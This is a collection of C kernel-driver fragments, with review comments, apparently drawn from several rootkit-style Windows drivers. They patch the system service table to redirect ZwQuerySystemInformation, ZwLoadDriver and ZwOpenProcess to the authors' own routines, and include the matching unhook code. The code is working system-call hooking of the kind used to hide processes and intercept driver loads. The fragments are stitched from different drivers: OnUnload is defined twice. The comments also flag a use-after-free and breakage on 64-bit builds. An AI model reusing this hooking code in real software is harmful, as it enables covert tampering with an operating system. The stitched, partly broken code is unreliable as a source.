/*
 * DriverEntry - initialisation for the "BHWin" driver.
 *
 * In order:
 *   1. make the pages holding the service table writable
 *      (ChangeServiceTableMemoryFlags, defined elsewhere in this driver);
 *   2. GetProcessNameOffset() - called for its side effect only; presumably
 *      caches an offset in a global, verify against its definition;
 *   3. register OnUnload so the swap below can be undone on unload;
 *   4. swap the ZwQuerySystemInformation slot of g_MappedSystemCallTable for
 *      NewZwQuerySystemInformation and keep the previous slot value in
 *      OldZwQuerySystemInformation.
 *
 * theRegistryPath is not used.
 * Returns STATUS_UNSUCCESSFUL when step 1 fails, STATUS_SUCCESS otherwise.
 *
 * NOTE(review): the value saved as "old" is simply whatever the slot held at
 * this moment; nothing verifies it is the kernel's own routine, so if another
 * component changed the slot first, that is what OnUnload later restores.
 * NOTE(review): the (PLONG)/(LONG) casts assume a 32-bit pointer; on a 64-bit
 * build they would truncate the function address.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath)
{
    DbgPrint("BHWin is al1v3!");

    // make sure we can write to the memory pages that hold the service table
    if (!NT_SUCCESS(ChangeServiceTableMemoryFlags())) {
        DbgPrint("Error, ChangeServiceTableMemoryFlags()");
        return STATUS_UNSUCCESSFUL;
    }

    // result (if any) is not used here
    GetProcessNameOffset();

    // unload routine restores the slot and releases the table mapping
    theDriverObject->DriverUnload = OnUnload;

    // place the hook using InterlockedExchange (no need to disable interrupts)
    // this uses the LOCK instruction to lock the memory bus during the next instruction
    // Example:
    //   LOCK INC DWORD PTR [EDX+04]
    // This staves off collisions on multi-processor machines, while cli/sti only
    // disable interrupts on the current processor.
    OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION) InterlockedExchange(
        (PLONG) &g_MappedSystemCallTable[SYSCALL_INDEX(ZwQuerySystemInformation)],
        (LONG) NewZwQuerySystemInformation);

    return STATUS_SUCCESS;
}
//-----------------------------------------------------------------------------
// Hook the system calls to allow us to pass control from user to kernel...
// LoadDriver system call hook is our gateway
//
// Replaces the ZwLoadDriver slot of syscall_tbl (presumably the writable
// mapping of the service table that OnUnload releases via mdl_sys_call) with
// hooked_ZwLoadDriver, keeping the previous slot value in orig_ZwLoadDriver
// so OnUnload can write it back. No return value; no error path.
//
// NOTE(review): the (unsigned int *)/(unsigned int) casts only hold on a
// 32-bit build; on 64-bit they truncate the pointer. The saved value is
// whatever the slot held at this moment, not necessarily the kernel's own
// routine.
//-----------------------------------------------------------------------------
VOID hook_syscalls()
{
    debug("\t add hook to ZwLoadDriver to reroute to our " \
          "hooked_ZwLoadDriver() \n");

    // atomic swap: old slot value out, our routine in
    orig_ZwLoadDriver = (void *) InterlockedExchange(
        (unsigned int *) &syscall_tbl[SYSCALL_INDEX(ZwLoadDriver)],
        (unsigned int) hooked_ZwLoadDriver);
}
/**
 * Restore the ZwOpenProcess hook (undo of sstHook_OpenProcess).
 *
 * Clears g_openProcessId, writes pOriNtOpenProcess back into the
 * ZwOpenProcess slot through UpdateService(), then unmaps and frees the
 * MDL (m_MDL / m_Mapped) that sstHook_OpenProcess created.
 *
 * Always returns STATUS_SUCCESS.
 *
 * NOTE(review): m_MDL is freed but never reset to NULL. sstHook_OpenProcess
 * only builds a fresh MDL when m_MDL == NULL, so a hook/unhook/hook sequence
 * would skip the rebuild and (presumably through m_Mapped) write via the
 * stale mapping - a use-after-free. Setting `m_MDL = NULL; m_Mapped = NULL;`
 * after IoFreeMdl would close that.
 * NOTE(review): the slot is overwritten without checking that it still holds
 * MyNtOpenProcess; whatever replaced it since the hook went in is lost.
 */
NTSTATUS sstUnhook_OpenProcess()
{
    g_openProcessId = 0;

    // put the saved entry back into the ZwOpenProcess slot
    UpdateService(SYSCALL_INDEX(ZwOpenProcess), pOriNtOpenProcess);

    // release the writable mapping of the service table
    if (m_MDL) {
        MmUnmapLockedPages(m_Mapped, m_MDL);
        IoFreeMdl(m_MDL);
    }

    return STATUS_SUCCESS;
}
/*
 * OnUnload - DriverUnload routine for the "BHWin" driver.
 *
 * Writes OldZwQuerySystemInformation (saved by DriverEntry) back into the
 * ZwQuerySystemInformation slot of g_MappedSystemCallTable, then unmaps and
 * frees the MDL behind that mapping if one exists.
 *
 * DriverObject is not used.
 *
 * NOTE(review): the restore is unconditional - if the slot was changed again
 * after DriverEntry ran, that later value is discarded. Nothing here waits
 * for callers that may still be inside NewZwQuerySystemInformation when the
 * image is unloaded; presumably accepted by the author, but verify.
 * NOTE(review): g_MappedSystemCallTableMDL is freed but not cleared; harmless
 * at unload time, but inconsistent with the guard around it.
 */
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
    DbgPrint("BHWIN: OnUnload called\n");

    // put back the old function pointer
    InterlockedExchange(
        (PLONG) &g_MappedSystemCallTable[SYSCALL_INDEX(ZwQuerySystemInformation)],
        (LONG) OldZwQuerySystemInformation);

    // Unlock and Free MDL
    if (g_MappedSystemCallTableMDL) {
        MmUnmapLockedPages(g_MappedSystemCallTable, g_MappedSystemCallTableMDL);
        IoFreeMdl(g_MappedSystemCallTableMDL);
    }
}
/**
 * Install the ZwOpenProcess hook.
 *
 * First call (m_MDL == NULL): describes the whole service table
 * (KeServiceDescriptorTable->ServiceTableBase, NumberOfService entries of
 * 4 bytes each) with an MDL, maps it to a kernel VA kept in m_Mapped, then
 * redirects the ZwOpenProcess slot to MyNtOpenProcess via HOOK_SYSCALL -
 * presumably the macro also saves the previous entry in pOriNtOpenProcess
 * (defined elsewhere, verify). g_openProcessId records
 * SYSTEMSERVICE(ZwOpenProcess).
 * Later calls (m_MDL already set): only re-point the slot with
 * UpdateService(), relying on pOriNtOpenProcess from the first call.
 *
 * Returns STATUS_UNSUCCESSFUL if MmCreateMdl fails, STATUS_SUCCESS otherwise.
 *
 * NOTE(review): the "* 4" hard-codes a 4-byte table entry, i.e. a 32-bit
 * service table; wrong size on a 64-bit build.
 * NOTE(review): m_Mapped is used without a NULL check. MmCreateMdl and
 * MmMapLockedPages are both documented as obsolete; on mapping failure
 * MmMapLockedPages is believed to raise/bug-check rather than return NULL on
 * the kernel-mode path - confirm for the target OS. If it did return NULL
 * the MDL would also be leaked because m_MDL stays set.
 * NOTE(review): MDL_MAPPED_TO_SYSTEM_VA is set by hand before the MDL is
 * actually mapped; the intent is not stated here.
 */
NTSTATUS sstHook_OpenProcess()
{
    if (m_MDL == NULL) {
        // MDL covering every entry of the service table
        m_MDL = MmCreateMdl(NULL, KeServiceDescriptorTable->ServiceTableBase, KeServiceDescriptorTable->NumberOfService * 4);
        if (!m_MDL) return STATUS_UNSUCCESSFUL;

        MmBuildMdlForNonPagedPool(m_MDL);

        // flag set before mapping - rationale not given in this file
        m_MDL->MdlFlags = m_MDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;

        // writable alias of the table; not checked for NULL
        m_Mapped = (PVOID *) MmMapLockedPages(m_MDL, KernelMode);

        // swaps the slot and (presumably) records the old entry in pOriNtOpenProcess
        HOOK_SYSCALL(ZwOpenProcess, MyNtOpenProcess, pOriNtOpenProcess);
        g_openProcessId = (ULONG) SYSTEMSERVICE(ZwOpenProcess);
        return STATUS_SUCCESS;
    }

    // mapping already exists: just re-point the slot
    UpdateService(SYSCALL_INDEX(ZwOpenProcess), (PVOID) MyNtOpenProcess);
    return STATUS_SUCCESS;
}
//-----------------------------------------------------------------------------
// Unload driver
//
// DriverUnload routine (appears to belong to a different driver than the
// "BHWin" OnUnload also on this page). Writes orig_ZwLoadDriver (saved by
// hook_syscalls) back into the ZwLoadDriver slot of syscall_tbl, releases the
// MDL mapping behind syscall_tbl, and removes the load-image notify routines
// registered under BREAK_POINT / DATA_MINING. DriverObject is not used.
//
// NOTE(review): PsRemoveLoadImageNotifyRoutine returns NTSTATUS; the result
// is dropped here, so a failed removal (callback left registered in an
// unloaded image) goes unnoticed. As in hook_syscalls, the (unsigned int *)
// casts assume a 32-bit build. mdl_sys_call is freed but not cleared.
//-----------------------------------------------------------------------------
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
    DbgPrint("---------------- Driver Unloaded\n");

    // put the saved entry back into the ZwLoadDriver slot
    InterlockedExchange(
        (unsigned int *) &syscall_tbl[SYSCALL_INDEX(ZwLoadDriver)],
        (unsigned int) orig_ZwLoadDriver);

    // release the writable mapping of the service table
    if (mdl_sys_call) {
        MmUnmapLockedPages(syscall_tbl, mdl_sys_call);
        IoFreeMdl(mdl_sys_call);
    }

    // remove callback
#if BREAK_POINT
    PsRemoveLoadImageNotifyRoutine(add_one_time_bp);
#endif
#if DATA_MINING
    PsRemoveLoadImageNotifyRoutine(add_hooks_for_data_mining);
#endif
}